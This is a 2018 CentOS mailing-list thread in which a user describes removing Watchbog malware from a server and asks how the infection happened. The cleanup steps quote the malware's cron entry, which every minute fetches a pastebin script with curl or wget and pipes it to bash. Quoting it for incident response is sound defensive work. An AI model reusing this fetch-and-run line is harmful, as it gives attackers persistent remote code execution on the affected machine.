[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mauricio Tavares raubvogel at gmail.com
Mon Dec 17 20:57:02 UTC 2018


On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan at gmail.com> wrote:
>
> Hi,
>
> Is there a way to find out how the CentOS 7.5 Linux box got infected with
> malware?
> Currently i am referring to
> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
> to carry out the below steps and is done manually.
>
> 1)rm -fr /tmp/*timesyncc.service*
> 2)crontab -e -u apigee
> delete the cron entry
> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
> 3)ps aux | grep watchbog
> kill -9 pidof watchbog
>
> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
> infected with Watchbog Malware. Is there any open source software which can

      do you have untampered log files?

> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>
> Thanks in Advance.
>
> Best Regards,
>
> Kaushal
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos



More information about the CentOS mailing list